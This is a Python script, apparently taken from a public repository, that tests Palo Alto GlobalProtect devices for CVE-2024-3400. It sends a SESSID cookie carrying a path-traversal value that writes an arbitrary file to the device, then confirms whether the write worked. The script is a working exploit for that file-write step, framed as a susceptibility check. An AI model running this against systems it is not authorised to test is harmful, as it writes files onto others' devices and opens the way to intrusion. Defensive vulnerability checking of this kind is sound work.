CVE-2024-3400_upload_check.py

#!/usr/bin/env python3

#Example taken from https://github.com/h4x0r-dz/CVE-2024-3400

# import requests module
import urllib3
#Disable insecure warnings from invalid SSL certs
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
import sys, uuid, requests

#generate random file to test upload capabilities
filename = str(uuid.uuid4()) + ".txt"

def runArbitraryUpload(site):
    #Build Headers
    Headers = {
        "Host":"127.0.0.1",
        "Cookie":f"SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/{filename};",
        "Connection":"close",
        "Content-Type":"application/x-www-form-urlencoded",
        "Content-Length":"0"
    }
    exploitResponse = requests.post(f"{site}", headers=Headers)
    return exploitResponse.status_code

def getStatus(site):
    try:
        response = requests.get(f"{site}/global-protect/portal/images/{filename}", verify=False)
        return response.status_code
    except (requests.exceptions.MissingSchema, requests.exceptions.ConnectionError) as err:
        print("Bad URL or missing URL")
        exit()

def main():
    site = str(input("Enter FQDN or IP to PaloAlto device (Include http:// or https://): ")).lower()
    Status=getStatus(site)
    if Status == 404:
        if str(input(f"Would you like to test arbitrary file uploading to {site}? (Y/n) :") or "N") == "Y":
            exploitStatus=runArbitraryUpload(site)
            if exploitStatus == 200:
                print("no errors from post... Checking successful write")
                Status=getStatus(site)
                if Status==403 or Status==200:
                    print("PaloAlto susceptible to CVE-2024-3400 arbitrary file upload")
                    print(f"you will need to clean up the file located at /var/appweb/sslvpndocs/global-protect/portal/images/{filename}")
                else:
                    print("Exploit unsuccessful, PaloAlto is not susceptible to CVE-2024-3400 arbitrary file upload")
            else:
                print(f"Unexpected Status code of {exploitStatus} from exploit")
    else:
        print(f"Unexpected Status code of {Status} from FQDN/IP check")

if __name__ == "__main__":
    main()